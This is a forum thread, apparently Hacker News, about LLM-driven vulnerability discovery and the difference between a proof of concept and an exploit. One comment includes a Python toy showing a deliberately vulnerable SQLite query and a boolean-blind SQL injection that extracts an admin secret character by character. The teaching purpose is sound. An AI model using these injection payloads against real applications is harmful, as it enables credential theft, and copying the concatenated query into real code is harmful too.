A hard read for a skeptic like me. A lot of speculation and extrapolation of a t...

acdha · 2026-03-31T00:10:51 1774915851

I tend to be skeptical, but I listened to the linked podcast with Carlini and found him very credible: not a sales guy, not an AI doomer, but someone talking about how little work he had to do to find real exploits in heavily-fuzzed code. I think it’s still a safe bet that many apps will be cumbersome to attack, but I think it’s still going to happen faster than I used to think.

https://securitycryptographywhatever.com/2026/03/25/ai-bug-f...

tptacek · 2026-03-31T00:19:40 1774916380

Nicholas Carlini is the real deal. He was most recently on the front page for "How to win a best paper award", about his experience winning a series of awards at Big 4 academic security conferences, most recently for work he coauthored with Adi Shamir (I'm just namedropping the obvious name) on stealing the weights from deep neural networks. Before all that (and before he got his doctorate), he and Hans Nielsen wrote the back half of Microcorruption.

He's not a sales guy.

acdha · 2026-03-31T02:38:33 1774924713

Thanks for having him on. It was really nice to hear a sober, experienced voice talking about their work with fellow practitioners.

tptacek · 2026-03-31T03:48:12 1774928892

Thank Nicholas! We'll talk to anyone. :)

m132 · 2026-03-31T01:05:25 1774919125

Thanks. Watched most of this talk and, unless I missed something, it seems to confirm what I was thinking—most of the strength currently comes from the scale you can deploy LLMs at, not them being better at vulnerability research than humans (if you factor out the throughput). And since this is a relatively new development, nobody really knows right now if this is going to have a greater impact than fuzzers and static analyzers had, or if newer models are ever going to get to a level that'd make computer security a solved problem.

woeirua · 2026-03-31T00:24:42 1774916682

There’s a video on YouTube of a talk Nicholas Carlini gave this past week. It’s eye-opening. If you don’t believe that LLMs are going to transform the cybersecurity space after watching that, I can’t help you.

tptacek · 2026-03-31T00:30:45 1774917045

It's this talk right here:

https://www.youtube.com/watch?v=1sd26pWhfmg

7 minutes in, he shows the SQLI he found in Ghost (the first sev:hi in the history of the project). If I'd remembered better, I would have mentioned in the post:

* it's a blind SQL injection

* Claude Code wrote an exploit for it. Not a POC. An exploit.

streetfighter64 · 2026-03-31T09:03:54 1774947834

> Not a POC. An exploit.

What's the distinction? A proof of concept is just something that demonstrates that a bug is possible to exploit, by doing so.

cushychicken · 2026-03-31T13:44:52 1774964692

Repeatability and/or an actual negative effect.

POC generally means “you can demonstrate unintentional behavior”.

“Exploit” means you can gain access or do something malicious.

It’s a fine line. The author’s point is that the LLM was able to demonstrate actual malfeasance, not just an unintended consequence. That’s a big deal considering that acting on malicious intent generally requires more know-how than a raw POC.

tptacek · 2026-03-31T17:37:25 1774978645

Specifically: the exploit extracted the admin's credentials from the database. A blind SQLI POC would simply demonstrate the existence of a timing channel based on a pathological input.
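To make the distinction concrete, here is a minimal toy sketch. It is not the Ghost bug, and every name in it (`make_db`, `post_exists`, the `posts` and `users` tables, the secret value) is made up for illustration. It also swaps the timing channel for a boolean one, since in-memory SQLite has no sleep function: the attacker only ever learns "row found" or "row not found". The POC shows the channel exists; the exploit uses the same channel to pull a value out of another table.

```python
import sqlite3
import string


def make_db():
    # Hypothetical schema, invented for this sketch.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE posts (slug TEXT)")
    db.execute("CREATE TABLE users (name TEXT, secret TEXT)")
    db.execute("INSERT INTO posts VALUES ('hello')")
    db.execute("INSERT INTO users VALUES ('admin', 's3cr3t')")
    return db


def post_exists(db, slug):
    # Deliberately vulnerable: user input is concatenated into the SQL text.
    # The caller only sees True/False, never query results ("blind").
    query = "SELECT 1 FROM posts WHERE slug = '" + slug + "'"
    return db.execute(query).fetchone() is not None


def poc(db):
    # POC: an injected true condition and an injected false condition
    # produce different answers, so a side channel exists.
    return (
        post_exists(db, "hello' AND 1=1 --"),
        post_exists(db, "hello' AND 1=2 --"),
    )


def extract_secret(db, max_len=32):
    # Exploit: ask one yes/no question per candidate character and
    # rebuild the admin's secret from the answers.
    alphabet = string.ascii_letters + string.digits
    recovered = ""
    for pos in range(1, max_len + 1):
        for ch in alphabet:
            payload = (
                "hello' AND (SELECT substr(secret, %d, 1) FROM users "
                "WHERE name = 'admin') = '%s' --" % (pos, ch)
            )
            if post_exists(db, payload):
                recovered += ch
                break
        else:
            # No candidate matched: we are past the end of the value.
            break
    return recovered


if __name__ == "__main__":
    db = make_db()
    print(poc(db))
    print(extract_secret(db))
```

Binding `slug` as a query parameter instead of concatenating it closes off both the POC and the exploit in this toy.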

cushychicken · 2026-03-31T21:01:19 1774990879

One other commenter asked a decent question: does going lighter (Zig) or harder (Rust) on memory safety confer any meaningful advantage against the phenomenon you describe?